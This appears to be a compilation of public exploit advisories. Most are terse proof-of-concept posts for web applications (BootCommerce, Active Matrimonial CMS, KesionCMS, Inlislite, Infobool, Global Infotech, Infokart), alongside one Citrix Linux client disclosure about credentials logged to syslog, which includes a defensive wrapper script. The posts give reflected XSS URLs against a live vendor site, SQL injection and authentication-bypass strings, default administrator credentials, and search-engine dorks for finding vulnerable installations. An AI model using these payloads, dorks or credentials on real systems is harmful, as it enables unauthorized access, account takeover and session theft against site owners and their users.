<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.mrplugins.it/bootcommerce/ │<br />│ Vendor : MrPlugins │<br />│ Software : BootCommerce 3.2.1 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /bootcommerce/search.php<br /><br /><br />URL parameter 'sp' is vulnerable to XSS<br /><br />https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tvbmhz4%22onfocus%3d%22alert(1)%22autofocus%3d%22dlit2&of=false&sp_n=t&sp_t=t&sp_d=t&sp_mk=t&sp_w=t<br /><br /><br />URL parameter 'of' is vulnerable to XSS<br /><br />https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=falsekav5w%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22h0xj6&sp_n=t&sp_t=t&sp_d=t&sp_mk=t&sp_w=t<br /><br />URL parameter 'sp_n' is vulnerable to XSS<br /><br />https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=false&sp_n=tl31l3%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22h93cp&sp_t=t&sp_d=t&sp_mk=t&sp_w=t<br /><br />URL parameter 'sp_t' is vulnerable to XSS<br /><br />https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=false&sp_n=t&sp_t=tlelcw%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22lho07&sp_d=t&sp_mk=t&sp_w=t<br /><br />URL parameter 'sp_d' is vulnerable to XSS<br /><br />https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=false&sp_n=t&sp_t=t&sp_d=trhpfz%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22nfcub&sp_mk=t&sp_w=t<br /><br />URL parameter 'sp_mk' is vulnerable to XSS<br /><br />https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=false&sp_n=t&sp_t=t&sp_d=t&sp_mk=tbgy05%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22abjmb&sp_w=t<br /><br />URL parameter 'sp_w' is vulnerable to XSS<br /><br />https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=false&sp_n=t&sp_t=t&sp_d=t&sp_mk=&sp_w=tbgy05%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22abjmb<br /><br /><br />Path: /bootcommerce/content/products/Books/<br /><br />URL parameter 'prc' is vulnerable to XSS<br /><br />https://www.mrplugins.it/bootcommerce/content/products/Books/?p=1&prcq3h55%22%3E%3Cscript%3Ealert(1)%3C/script%3Egwsd7&of=false<br /><br />[-] Done<br /></code></pre>
<pre><code># Citrix Linux client credential leak<br /><br />The Citrix Linux client emits its session credentials when starting a Citrix<br />session. These credentials end up being recorded in the client's system log.<br /><br />Citrix do not consider this to be a security vulnerability.<br /><br /># Software affected<br /><br />- Citrix Workspace App for Linux versions 2212.<br /><br />Other versions are likely affected.<br /><br /># Context<br /><br />When connecting to a Citrix session via a web browser such as Firefox on Linux,<br />typically you access a web application known as Citrix Storefront. This<br />provides clickable icons for the applications and remote desktop sessions<br />available to you.<br /><br />When you click on one of these, your browser is instructed to open a URL of the<br />form `receiver://.....` which is handled using `/opt/Citrix/ICAClient/util/ctxwebhelper`.<br />`ctxwebhelper` parses the URL and uses the decoded information to make a HTTP<br />GET request to the remote server for an 'ica' file, which contains the<br />connection details necessary to launch the Citrix client software,<br />`/opt/Citrix/ICAClient/wfica`.<br /><br />The ICA file contains details such as the server hostname and temporary session<br />credentials needed to authenticate the session.<br /><br /># The issue<br /><br />When making the GET request to retrieve the ICA file, `ctxwebhelper` echos the<br />full HTTP response (headers & body) to standard output, which ends up feeding<br />into journald and then into the system log files.<br /><br />This can be demonstrated by connecting to a Citrix session and running:<br /><br /> grep receiver\\.desktop.*LogonTicket= /var/log/syslog<br /><br />which will produce output such as<br /><br /> 2023-01-12T11:15:46.816466+00:00 myhostname receiver.desktop[9999]: LogonTicket=1234567890ABCDEF1234567890ABCD<br /><br /># Vendor response<br /><br />Citrix responded to my report on 2023-01-05 to say they do not consider this a product vulnerability:<br /><br /> Thank you for bearing with us. We have concluded the security<br /> investigation into the reported issue and determined that the contents<br /> of /var/log/syslog can only be read or written by root user, or a<br /> syslog user or an adm group but not by an unprivileged user. As a<br /> result, we do not consider this finding as a vulnerability in the<br /> product.<br /><br /> We would like to thank you for submitting the finding and helping to<br /> keep Citrix customers safe.<br /><br /> Best Regards,<br /><br /> Citrix Security Response Team<br /><br />This is short-sighted in my opinion - logs should not be considered safe places<br />to store credentials, even temporary ones.<br /><br /># Workaround<br /><br />Since Citrix do not consider this a vulnerability it seems unlikely this behaviour will change.<br /><br />You can work around this issue by replacing ctxwebhelper with a wrapper script<br />that either discards or filters its output.<br /><br />First, rename `ctxwebhelper`:<br /><br /> mv /opt/Citrix/ICAClient/util/ctxwebhelper /opt/Citrix/ICAClient/util/ctxwebhelper.real<br /><br />Next, place a script in its place, which first redirects stdout and stderr to /dev/null before executing the real `ctxwebhelper`:<br /><br /> #!/bin/bash<br /> set -eu<br /> exec &>/dev/null<br /> "$(dirname "$0")"/ctxwebhelper.real "$@"<br /><br />Don't forget to `chmod +x /opt/Citrix/ICAClient/util/ctxwebhelper` after doing this.<br /><br />This script is available from this repository - see `ctxwebhelper.wrapper`.<br /><br />Note that this will be overwritten if the Citrix client is reinstalled.<br /><br /># Timeline<br /><br />2022-12-11: Issue disclosed to Citrix via email to secure@citrix.com<br /><br />2022-12-13: Citrix acknowledges receipt of the report, assigns identifier `CASE-8324`.<br /><br />2023-01-05: Citrix reponds to say they do not consider it a vulnerability.<br /><br />2023-01-07: Reply to Citrix requesting they reconsider their assessment.<br /><br />2023-01-14: Public disclosure.<br /><br /># Author<br /><br />Russell Howe. [Github](https://github.com/rhowe) [Twitter](https://twitter.com/rhowe212).<br /><br /><br />ctxwebhelper.wrapper:<br /><br />#!/bin/bash<br /><br /># Brexit flags<br />set -eu<br /><br /># Ensure stdout and stderr are discarded<br />exec &>/dev/null<br /><br /># Execute the real ctxwebhelper<br />"$(dirname "$0")"/ctxwebhelper.real "$@"<br />Footer<br /><br /><br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Active Matrimonial CMS v3.5 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit) | <br />| # Vendor : https://codecanyon.net/item/active-matrimonial-cms/21627663?s_rank=25 | <br />| # Dork : "Every user registered on Active Matrimonial is verified via photo and mobile phone " |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is about leaving the default settings<br /> During the installation of the script and using the default username and password<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user=admin@example.com & pass=123456 <br /><br />[+] https://127.0.0.1/matrimonial.instaaworkcom/admin/<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : yazılımı jettweb Haber V3 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) |<br />| # Vendor : http://haberv3.proemlaksitesi.net/ | <br />| # Dork : "yazılımı jettweb" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] In the search box, we use the payload : <--`<img/src=` onerror=confirm`https://cxsecurity.com/author/indoushka/1/`> --!><br /><br />[+] test : https://127.0.0.1/haberv3proemlaksitesinet/ <br /><br /><br />==Greetings to :=========================================================================================================================<br />| |<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* thelastvvv *Zigoo.eg * moncet |<br />| |<br />=========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Incrementer CMS v0.1 Technology Solutions Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | <br />| # Vendor : https://microdynamicsind.com/ | <br />| # Dork : "Designed & Developed by Incrementer Technology Solutions Pvt. Ltd." |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is about leaving the default settings<br /> During the installation of the script and using the default username and password<br /> <br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user=admin@gmail.com & pass=123456 <br /><br />[+] https://127.0.0.1/silovely/505@erroradmin/<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Inlislite V3.2 Backdoor Account Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | <br />| # Vendor : https://inlislite.perpusnas.go.id/?read=installerphp | <br />| # Dork : Inlislite V3.2 © 2017 - 2018 |<br />====================================================================================================================================<br /><br />poc :<br />[+] The vulnerability is about leaving the default settings<br /> During the installation of the script and using the default username and password<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user=inlislite & pass=inlislite= or user=superadmin & pass=superadmin<br /><br />[+] https://inlislite.127.0.0.1/backend/<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : KesionCMS X 1.5.160902 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit) | <br />| # Vendor : https://www.kesion.com/ | <br />| # Dork : Powered by KesionCMS |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is about leaving the default settings<br /> During the installation of the script and using the default username and password<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user=admin & pass=admin888 <br /><br />[+] http://127.0.0.1.com/kesion/Admin/index.asp<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Infobool v 3.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://www.infobool.com/ | <br />| # Dork : "© 2017 All rights reserved. Powered By: Infobool" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : user : 'or''=' & Pass : 'or''='<br /><br />[+] https://www.com/admin/<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Global Infotech cms v 1.0 Sql injectioin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : http://www.globalinfotech.co | <br />| # Dork : intext:"Powered by : Global Infotech" |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] http://127.0.0.1/dhamdhacollegeacin/faculty.aspx?staff=1%27 <===== inject here<br /><br />[+] login : http://127.0.0.1/dhamdhacollegeacin/admin/<br /><br />===========================================================================================================================================================================================================================================================================<br />| # Title : Global Infotech cms v 1.0 Auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : http://www.globalinfotech.co | <br />| # Dork : intext:"Powered by : Global Infotech" |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] Use Payload = user & pass : 1'or'1'='1<br /><br />[+] http://127.0.0.1/aaravcscdurgcom/admin/Dashboard.aspx<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Infokart v1.1 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://eatself.com/ | <br />| # Dork : Powered by Infokart India Pvt. Ltd. |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : user : 1'or'1'='1 & Pass : 1'or'1'='1<br /><br />[+] https://wwwcom/admin/Suggestion<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>